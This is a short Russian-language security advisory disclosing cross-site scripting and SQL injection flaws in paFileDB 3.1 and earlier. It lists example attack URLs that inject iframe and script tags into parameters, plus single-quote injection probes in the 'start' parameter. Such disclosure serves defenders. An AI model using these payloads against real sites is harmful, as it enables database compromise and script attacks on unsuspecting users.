Программа: paFileDB 3.1 и более ранние версии
Уязвимость позволяет удаленному
пользователю произвести XSS нападение и
выполнить произвольные SQL команды в базе
данных уязвимого приложения.
1. Межсайтовый скриптинг возможен из-за
некорректной фильтрации входных данных в
некоторых параметрах. Злоумышленник может
с помощью специально сформированного URL
выполнить произвольный HTML сценарий в
браузере целевого пользователя.
Примеры:
http://[target]/[pafiledb_dir]/pafiledb.php?action=viewall&start=">
<iframe%20src=http://www.securityreason.com></iframe>&sortby=rating
http://[target]/[pafiledb_dir]/pafiledb.php?action=category&start=">
<iframe%20src=http://www.securityreason.com></iframe>&sortby=date
http://[target]/[pafiledb_dir]/pafiledb.php?"><script>alert();</script>
http://[target]/[pafiledb_d ir]/pafiledb.php?action="><script>alert();</script>
http://[target]/[pafiledb_dir]/pafiledb.php?[something]=">< script>alert();</script>
http://[target]/[pafiledb_dir]/p
afiledb.php?[something]=&[something]="> <script>alert();</script>
2. Отсутствует фильтрация входных данных в
параметре start. Удаленный пользователь может
с помощью специально сформированного URL
выполнить произвольные SQL команды на
уязвимой системе.
Пример:
http://[target]/[pafiledb_dir]/pafiledb.php?action=viewall&start='&sortby=rating
http://[target]/[pafiledb_dir]/pafiledb.php?action=category&start='&sortby=rating